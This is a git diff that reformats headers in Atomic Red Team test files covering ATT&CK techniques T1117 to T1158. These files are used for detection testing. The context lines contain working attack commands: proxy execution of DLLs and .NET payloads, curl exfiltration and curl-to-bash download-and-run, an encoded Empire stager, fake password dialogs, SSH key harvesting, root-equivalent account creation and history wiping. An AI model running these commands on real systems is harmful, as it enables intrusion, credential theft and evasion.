@@ -66,8 +64,7 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr |------|-------------|------|---------------| | dll_name | Name of DLL to Execute, DLL Should export DllRegisterServer | Path | C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` "IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )" ```
diff --git a/atomics/T1118/T1118.md b/atomics/T1118/T1118.md index 147e1b2e..940ac5a1 100644 --- a/atomics/T1118/T1118.md +++ b/atomics/T1118/T1118.md @@ -24,8 +24,7 @@ Executes the Uninstall Method |------|-------------|------|---------------| | filename | location of the payload | Path | C:\AtomicRedTeam\atomics\T1118\src\T1118.dll| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:C:\AtomicRedTeam\atomics\T1118\src\T1118.dll C:\AtomicRedTeam\atomics\T1118\src\T1118.cs C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U #{filename} ``` @@ -43,8 +42,7 @@ Executes the Uninstall Method |------|-------------|------|---------------| | filename | location of the payload | Path | C:\AtomicRedTeam\atomics\T1118\src\T1118.dll| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:C:\AtomicRedTeam\atomics\T1118\src\T1118.dll C:\AtomicRedTeam\atomics\T1118\src\T1118.cs C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /? #{filename} ``` diff --git a/atomics/T1119/T1119.md b/atomics/T1119/T1119.md index f4ff6359..f5644b27 100644 --- a/atomics/T1119/T1119.md +++ b/atomics/T1119/T1119.md @@ -19,8 +19,7 @@ Automated Collection **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` dir c: /b /s .docx | findstr /e .docx for /R c: %f in (*.docx) do copy %f c:\temp\ ``` @@ -33,8 +32,7 @@ Automated Collection **Supported Platforms:** Windows -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination c:\temp} ```
diff --git a/atomics/T1121/T1121.md b/atomics/T1121/T1121.md index cb09261a..574af610 100644 --- a/atomics/T1121/T1121.md +++ b/atomics/T1121/T1121.md @@ -25,8 +25,7 @@ Executes the Uninstall Method, No Admin Rights Required | file_name | Location of the payload | Path | T1121.dll| | source_file | Location of the CSharp source_file | Path | C:\AtomicRedTeam\atomics\T1121\src\T1121.cs| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library #{source_file} C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{file_name} del #{file_name} @@ -46,8 +45,7 @@ Executes the Uninstall Method, No Admin Rights Required, Requires SNK | file_name | Location of the payload | Path | T1121.dll| | source_file | Location of the CSharp source_file | Path | C:\AtomicRedTeam\atomics\T1121\src\T1121.cs| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' $Content = [System.Convert]::FromBase64String($key) Set-Content key.snk -Value $Content -Encoding Byte diff --git a/atomics/T1122/T1122.md b/atomics/T1122/T1122.md index e252d504..82bcad69 100644 --- a/atomics/T1122/T1122.md +++ b/atomics/T1122/T1122.md @@ -15,8 +15,7 @@ Hijack COM Object used by certutil.exe **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` reg import ..\src\COMHijack.reg certutil.exe -CAInfo reg import ..\src\COMHijackCleanup.reg diff --git a/atomics/T1123/T1123.md b/atomics/T1123/T1123.md index a15b88cc..da5bd268 100644 --- a/atomics/T1123/T1123.md +++ b/atomics/T1123/T1123.md @@ -25,8 +25,7 @@ Create a file called test.wma, with the duration of 30 seconds | output_file | Path to the recording file being captured | Path | test.wma| | duration_hms | Duration of audio to be recorded (in h:m:s format) | Path | 30| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` SoundRecorder /FILE #{output_file} /DURATION #{duration_hms} ```
@@ -38,8 +37,7 @@ SoundRecorder /FILE #{output_file} /DURATION #{duration_hms} **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet ```
diff --git a/atomics/T1124/T1124.md b/atomics/T1124/T1124.md index 018d215e..baf90010 100644 --- a/atomics/T1124/T1124.md +++ b/atomics/T1124/T1124.md @@ -24,8 +24,7 @@ Identify the system time |------|-------------|------|---------------| | computer_name | computer name to query | string | computer1| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` net time \\#{computer_name} w32tm /tz ``` @@ -38,8 +37,7 @@ Identify the system time via PowerShell **Supported Platforms:** Windows -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` Get-Date ```
diff --git a/atomics/T1126/T1126.md b/atomics/T1126/T1126.md index 4093e693..864ae9de 100644 --- a/atomics/T1126/T1126.md +++ b/atomics/T1126/T1126.md @@ -26,8 +26,7 @@ Add a Network Share utilizing the command_prompt |------|-------------|------|---------------| | share_name | Share to add. | string | \\test\share| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` net use c: #{share_name} net share test=#{share_name} /REMARK:"test share" /CACHE:No ``` @@ -45,8 +44,7 @@ Removes a Network Share utilizing the command_prompt |------|-------------|------|---------------| | share_name | Share to remove. | string | \\test\share| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` net share #{share_name} /delete ```
@@ -63,8 +61,7 @@ Removes a Network Share utilizing PowerShell |------|-------------|------|---------------| | share_name | Share to remove. | string | \\test\share| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` Remove-SmbShare -Name #{share_name} Remove-FileShare -Name #{share_name} ``` diff --git a/atomics/T1127/T1127.md b/atomics/T1127/T1127.md index 024c9d09..946a087a 100644 --- a/atomics/T1127/T1127.md +++ b/atomics/T1127/T1127.md @@ -52,8 +52,7 @@ Executes the code in a project file using. C# Example |------|-------------|------|---------------| | filename | Location of the project file | Path | T1127.csproj| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename} ```
diff --git a/atomics/T1128/T1128.md b/atomics/T1128/T1128.md index 36a75917..41717a40 100644 --- a/atomics/T1128/T1128.md +++ b/atomics/T1128/T1128.md @@ -24,8 +24,7 @@ Netsh interacts with other operating system components using dynamic-link librar |------|-------------|------|---------------| | helper_file | Path to DLL | Path | C:\Path\file.dll| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` netsh.exe add helper #{helper_file} ```
diff --git a/atomics/T1130/T1130.md b/atomics/T1130/T1130.md index 7f5938ff..09ba3e87 100644 --- a/atomics/T1130/T1130.md +++ b/atomics/T1130/T1130.md @@ -29,8 +29,7 @@ Creates a root CA with openssl | key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key| | cert_filename | Path of the CA certificate we create | Path | rootCA.crt| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` openssl genrsa -out #{key_filename} 4096 openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -out #{cert_filename} diff --git a/atomics/T1132/T1132.md b/atomics/T1132/T1132.md index 9f787156..02c2487c 100644 --- a/atomics/T1132/T1132.md +++ b/atomics/T1132/T1132.md @@ -21,8 +21,7 @@ Utilizing a common technique for posting base64 encoded data. | destination_url | Destination URL to post encoded data. | string | redcanary.com| | base64_data | Encoded data to post using fake Social Security number 111-11-1111. | string | MTExLTExLTExMTE=| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` echo -n 111-11-1111 | base64 curl -XPOST #{base64_data}.#{destination_url} ``` diff --git a/atomics/T1134/T1134.md b/atomics/T1134/T1134.md index d800911d..88041e05 100644 --- a/atomics/T1134/T1134.md +++ b/atomics/T1134/T1134.md @@ -35,8 +35,7 @@ Requires Administrator Privileges To Execute Test |------|-------------|------|---------------| | target_user | Username To Steal Token From | String | SYSTEM| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` #list processes by user, $owners = @{} diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md index 04f1b719..66fc9d61 100644 --- a/atomics/T1135/T1135.md +++ b/atomics/T1135/T1135.md @@ -36,8 +36,7 @@ Network Share Discovery |------|-------------|------|---------------| | computer_name | Computer name to find a mount on. | string | computer1| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` df -aH smbutil view -g //#{computer_name} showmount #{computer_name} @@ -56,8 +55,7 @@ Network Share Discovery utilizing the command prompt |------|-------------|------|---------------| | computer_name | Computer name to find a mount on. | string | computer1| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` net view \\#{computer_name} ```
@@ -74,8 +72,7 @@ Network Share Discovery utilizing PowerShell |------|-------------|------|---------------| | computer_name | Computer name to find a mount on. | string | computer1| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` net view \\#{computer_name} get-smbshare -Name #{computer_name} ``` diff --git a/atomics/T1136/T1136.md b/atomics/T1136/T1136.md index a696863c..ac02069b 100644 --- a/atomics/T1136/T1136.md +++ b/atomics/T1136/T1136.md @@ -31,8 +31,7 @@ Create a user via useradd | username | Username of the user to create | String | evil_user| | comment | Comment to record when creating the user | String | Evil Account| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` useradd -M -N -r -s /bin/bash -c "#{comment}" #{username} ```
@@ -50,8 +49,7 @@ Creates a user on a MacOS system with dscl | username | Username of the user to create | String | evil_user| | realname | 'realname' to record when creating the user | String | Evil Account| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` dscl . -create /Users/#{username} dscl . -create /Users/#{username} UserShell /bin/bash dscl . -create /Users/#{username} RealName "#{realname}" @@ -73,8 +71,7 @@ Creates a new user in a command prompt |------|-------------|------|---------------| | username | Username of the user to create | String | Evil Account| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` net user /add #{username} ```
@@ -91,8 +88,7 @@ Creates a new user in PowerShell |------|-------------|------|---------------| | username | Username of the user to create | String | Evil Account| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` New-LocalUser -Name #{username} -NoPassword net user /add #{username} ``` @@ -111,8 +107,7 @@ Creates a new user in Linux and adds the user to the `root` group. This techniqu | username | Username of the user to create | String | butter| | password | Password of the user to create | String | BetterWithButter| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username} echo "#{password}" | passwd --stdin #{username} ``` diff --git a/atomics/T1137/T1137.md b/atomics/T1137/T1137.md index 9e4c5da7..03073720 100644 --- a/atomics/T1137/T1137.md +++ b/atomics/T1137/T1137.md @@ -58,8 +58,7 @@ Word VBA Macro **Supported Platforms:** Windows -#### Run it with these steps! -1. Open Word +#### Run it with these steps! 1. Open Word 2. Insert tab -> Quick Parts -> Field diff --git a/atomics/T1138/T1138.md b/atomics/T1138/T1138.md index ee5354a1..92348bd7 100644 --- a/atomics/T1138/T1138.md +++ b/atomics/T1138/T1138.md @@ -36,8 +36,7 @@ place to start. |------|-------------|------|---------------| | file_path | Path to the shim databaase file | String | C:\AtomicRedTeam\atomics\T1138\src\AtomicShimx86.sdb| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` sdbinst.exe #{file_path} sdbinst.exe -u #{file_path} ``` diff --git a/atomics/T1139/T1139.md b/atomics/T1139/T1139.md index 3097ce34..94087c72 100644 --- a/atomics/T1139/T1139.md +++ b/atomics/T1139/T1139.md @@ -22,8 +22,7 @@ xxxx | bash_history_grep_args | grep arguments that filter out specific commands we want to capture | Path | -e '-p ' -e 'pass' -e 'ssh'| | output_file | Path where captured results will be placed | Path | ~/loot.txt| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file} ```
diff --git a/atomics/T1140/T1140.md b/atomics/T1140/T1140.md index 06c3d588..4434a757 100644 --- a/atomics/T1140/T1140.md +++ b/atomics/T1140/T1140.md @@ -28,8 +28,7 @@ Encode/Decode executable |------|-------------|------|---------------| | executable | name of executable | path | c:\file.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` certutil.exe -encode #{executable} file.txt certutil.exe -decode file.txt #{executable} ``` @@ -47,8 +46,7 @@ Rename certutil and decode a file. This is in reference to latest research by Fi |------|-------------|------|---------------| | executable | name of executable/file to decode | path | c:\file.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp cmd.exe /c %temp%tcm.tmp -decode #{executable} file.txt ``` diff --git a/atomics/T1141/T1141.md b/atomics/T1141/T1141.md index f0e57adc..0ef81bf2 100644 --- a/atomics/T1141/T1141.md +++ b/atomics/T1141/T1141.md @@ -20,8 +20,7 @@ Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.htm **Supported Platforms:** macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"' ```
@@ -35,8 +34,7 @@ Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` powershell.exe -command {$cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo $cred.GetNetworkCredential().Password;} ```
diff --git a/atomics/T1142/T1142.md b/atomics/T1142/T1142.md index 92e64cf0..c17dc5e0 100644 --- a/atomics/T1142/T1142.md +++ b/atomics/T1142/T1142.md @@ -27,8 +27,7 @@ To manage their credentials, users have to use additional credentials to access **Supported Platforms:** macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` security -h security find-certificate -a -p > allcerts.pem security import /tmp/certs.pem -k diff --git a/atomics/T1144/T1144.md b/atomics/T1144/T1144.md index 38d30726..9f3bd167 100644 --- a/atomics/T1144/T1144.md +++ b/atomics/T1144/T1144.md @@ -24,8 +24,7 @@ Gatekeeper Bypass via command line |------|-------------|------|---------------| | app_path | Path to app to be used | Path | myapp.app| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` sudo xattr -r -d com.apple.quarantine #{app_path} sudo spctl --master-disable ``` diff --git a/atomics/T1145/T1145.md b/atomics/T1145/T1145.md index ca7e31da..61780990 100644 --- a/atomics/T1145/T1145.md +++ b/atomics/T1145/T1145.md @@ -29,8 +29,7 @@ File extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, . **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` echo "ATOMICREDTEAM" > %windir%\cert.key dir c:\ /b /s .key | findstr /e .key ``` @@ -48,8 +47,7 @@ Discover private SSH keys on a macOS or Linux system. |------|-------------|------|---------------| | output_file | Output file containing locations of SSH key files | path | /tmp/keyfile_locations.txt| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` find / -name id_rsa >> #{output_file} find / -name id_dsa >> #{output_file} ``` @@ -67,8 +65,7 @@ Copy private SSH keys on a Linux system to a staging folder using the `cp` comma |------|-------------|------|---------------| | output_folder | Output folder containing copies of SSH private key files | path | /tmp/art-staging| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` mkdir #{output_folder} find / -name id_rsa -exec cp --parents {} #{output_folder} \; find / -name id_dsa -exec cp --parents {} #{output_folder} \; @@ -87,8 +84,7 @@ Copy private SSH keys on a Linux or macOS system to a staging folder using the ` |------|-------------|------|---------------| | output_folder | Output folder containing copies of SSH private key files | path | /tmp/art-staging| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` mkdir #{output_folder} find / -name id_rsa -exec rsync -R {} #{output_folder} \; find / -name id_dsa -exec rsync -R {} #{output_folder} \; diff --git a/atomics/T1146/T1146.md b/atomics/T1146/T1146.md index 30302a12..8a928645 100644 --- a/atomics/T1146/T1146.md +++ b/atomics/T1146/T1146.md @@ -25,8 +25,7 @@ Clears bash history via rm **Supported Platforms:** Linux, macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` rm ~/.bash_history ```
@@ -38,8 +37,7 @@ Clears bash history via rm **Supported Platforms:** Linux, macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` echo "" > ~/.bash_history ```
@@ -51,8 +49,7 @@ Clears bash history via cat /dev/null **Supported Platforms:** Linux, macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` cat /dev/null > ~/.bash_history ```
@@ -64,8 +61,7 @@ Clears bash history via a symlink to /dev/null **Supported Platforms:** Linux, macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` ln -sf /dev/null ~/.bash_history ```
@@ -77,8 +73,7 @@ Clears bash history via truncate **Supported Platforms:** Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` truncate -s0 ~/.bash_history ```
@@ -90,8 +85,7 @@ Clears the history of a bunch of different shell types by setting the history si **Supported Platforms:** Linux, macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` unset HISTFILE export HISTFILESIZE=0 history -c diff --git a/atomics/T1147/T1147.md b/atomics/T1147/T1147.md index b70b2c8a..bf4d0884 100644 --- a/atomics/T1147/T1147.md +++ b/atomics/T1147/T1147.md @@ -20,8 +20,7 @@ Add a hidden user on MacOS |------|-------------|------|---------------| | user_name | username to add | string | APT| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` sudo dscl . -create /Users/#{user_name} UniqueID 333 ```
diff --git a/atomics/T1148/T1148.md b/atomics/T1148/T1148.md index f91f71ff..898b2636 100644 --- a/atomics/T1148/T1148.md +++ b/atomics/T1148/T1148.md @@ -22,8 +22,7 @@ Disables history collection in shells |------|-------------|------|---------------| | evil_command | Command to run after shell history collection is disabled | String | whoami| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` export HISTCONTROL=ignoreboth ls #{evil_command} ``` @@ -36,8 +35,7 @@ xxx **Supported Platforms:** macOS, Linux -#### Run it with these steps! -1. export HISTCONTROL=ignoreboth +#### Run it with these steps! 1. export HISTCONTROL=ignoreboth 2. echo export "HISTCONTROL=ignoreboth" >> ~/.bash_profile 3. ls 4. whoami > recon.txt diff --git a/atomics/T1150/T1150.md b/atomics/T1150/T1150.md index dd7c9b94..66a2ae33 100644 --- a/atomics/T1150/T1150.md +++ b/atomics/T1150/T1150.md @@ -16,8 +16,7 @@ Modify MacOS plist file in one of two directories **Supported Platforms:** macOS -#### Run it with these steps! -1. Modify a .plist in +#### Run it with these steps! 1. Modify a .plist in /Library/Preferences diff --git a/atomics/T1151/T1151.md b/atomics/T1151/T1151.md index d8b93332..2d783174 100644 --- a/atomics/T1151/T1151.md +++ b/atomics/T1151/T1151.md @@ -17,8 +17,7 @@ Space After Filename **Supported Platforms:** macOS -#### Run it with these steps! -1. echo '#!/bin/bash\necho "print \"hello, world!\"" | /usr/bin/python\nexit' > execute.txt && chmod +x execute.txt +#### Run it with these steps! 1. echo '#!/bin/bash\necho "print \"hello, world!\"" | /usr/bin/python\nexit' > execute.txt && chmod +x execute.txt 2. mv execute.txt "execute.txt " diff --git a/atomics/T1152/T1152.md b/atomics/T1152/T1152.md index 79b0ace6..c3f45a96 100644 --- a/atomics/T1152/T1152.md +++ b/atomics/T1152/T1152.md @@ -17,8 +17,7 @@ Utilize launchctl **Supported Platforms:** macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator ```
diff --git a/atomics/T1153/T1153.md b/atomics/T1153/T1153.md index b3acc2e5..7e727d4d 100644 --- a/atomics/T1153/T1153.md +++ b/atomics/T1153/T1153.md @@ -19,8 +19,7 @@ Creates a script and executes it using the source command **Supported Platforms:** macOS, Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh" chmod +x /tmp/art.sh source /tmp/art.sh @@ -34,8 +33,7 @@ Creates a script and executes it using the source command's dot alias **Supported Platforms:** macOS, Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh" chmod +x /tmp/art.sh . /tmp/art.sh diff --git a/atomics/T1154/T1154.md b/atomics/T1154/T1154.md index ba1a1319..77f82572 100644 --- a/atomics/T1154/T1154.md +++ b/atomics/T1154/T1154.md @@ -17,8 +17,7 @@ After sending a keyboard interrupt (CTRL+C) the script will download and execute **Supported Platforms:** macOS, CentOS, Ubuntu, Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' EXIT exit trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' INT diff --git a/atomics/T1155/T1155.md b/atomics/T1155/T1155.md index 08cefc48..cd8c0306 100644 --- a/atomics/T1155/T1155.md +++ b/atomics/T1155/T1155.md @@ -22,8 +22,7 @@ https://github.com/EmpireProject/Empire **Supported Platforms:** macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyc4Yzk0OThmYjg1YmQ1MTE5ZGQ5ODQ4MTJlZTVlOTg5OSc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSkK'));\" | python &"" ```
diff --git a/atomics/T1156/T1156.md b/atomics/T1156/T1156.md index 1d81f042..f0fae3f9 100644 --- a/atomics/T1156/T1156.md +++ b/atomics/T1156/T1156.md @@ -26,8 +26,7 @@ Adds a command to the .bash_profile file of the current user |------|-------------|------|---------------| | command_to_add | Command to add to the .bash_profile file | string | /path/to/script.py| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` echo "#{command_to_add}" >> ~/.bash_profile ```
@@ -44,8 +43,7 @@ Adds a command to the .bashrc file of the current user |------|-------------|------|---------------| | command_to_add | Command to add to the .bashrc file | string | /path/to/script.py| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` echo "#{command_to_add}" >> ~/.bashrc ```
diff --git a/atomics/T1158/T1158.md b/atomics/T1158/T1158.md index f74d5e1c..18029818 100644 --- a/atomics/T1158/T1158.md +++ b/atomics/T1158/T1158.md @@ -52,8 +52,7 @@ Creates a hidden file inside a hidden directory **Supported Platforms:** Linux, macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` mkdir .hidden-directory echo "this file is hidden" > .hidden-directory/.hidden-file ``` @@ -66,8 +65,7 @@ Hide a file on MacOS **Supported Platforms:** macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` sudo xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00" ```
@@ -85,8 +83,7 @@ mv file to a .file | filename | path of file to hide | path | /tmp/evil| | output_filename | output path of file | path | /tmp/evil| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` mv #{filename} .#{output_filename} ```
@@ -103,8 +100,7 @@ Creates a file and marks it as a system file using the attrib.exe utility. |------|-------------|------|---------------| | filename | path of file to mark as system | path | C:\Windows\Temp\sensitive_file.txt| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` attrib.exe +s #{filename} ```
@@ -121,8 +117,7 @@ Creates a file and marks it as hidden using the attrib.exe utility. |------|-------------|------|---------------| | filename | path of file to mark as hidden | path | C:\Windows\Temp\sensitive_file.txt| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` attrib.exe +h #{filename} ```
@@ -139,8 +134,7 @@ Requires Apple Dev Tools |------|-------------|------|---------------| | filename | path of file to hide | path | /tmp/evil| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` setfile -a V #{filename} ```
@@ -157,8 +151,7 @@ Hide a directory on MacOS |------|-------------|------|---------------| | filename | path of file to hide | path | /tmp/evil| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` chflags hidden #{filename} ```
@@ -170,8 +163,7 @@ Show all hidden files on MacOS **Supported Platforms:** macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` defaults write com.apple.finder AppleShowAllFiles YES ```
@@ -183,8 +175,7 @@ Create visible directories on MacOS and Linux **Supported Platforms:** macOS, Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` mkdir visible-directory echo "this file is visible" > visible-directory/visible-file ls @@ -199,8 +190,7 @@ Create hidden directories and files on Nix platforms **Supported Platforms:** macOS, Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` mkdir .hidden-directory echo "this file is hidden" > .hidden-directory/.hidden-file ls -la @@ -221,8 +211,7 @@ Create an Alternate Data Stream with the command prompt. Write access is require | file_name | File name of file to create ADS on. | string | test.txt| | ads_filename | Name of ADS file. | string | adstest.txt| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` echo "test" > #{file_name}:#{ads_filename} echo "test" > :#{ads_filename} dir /s /r | find ":$DATA" @@ -242,8 +231,7 @@ Create an Alternate Data Stream with PowerShell. Write access is required. | file_name | File name of file to create ADS on. | string | test.txt| | ads_filename | Name of ADS file. | string | adstest.txt| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test" set-content -path #{file_name} -stream #{ads_filename} -value "test2" set-content 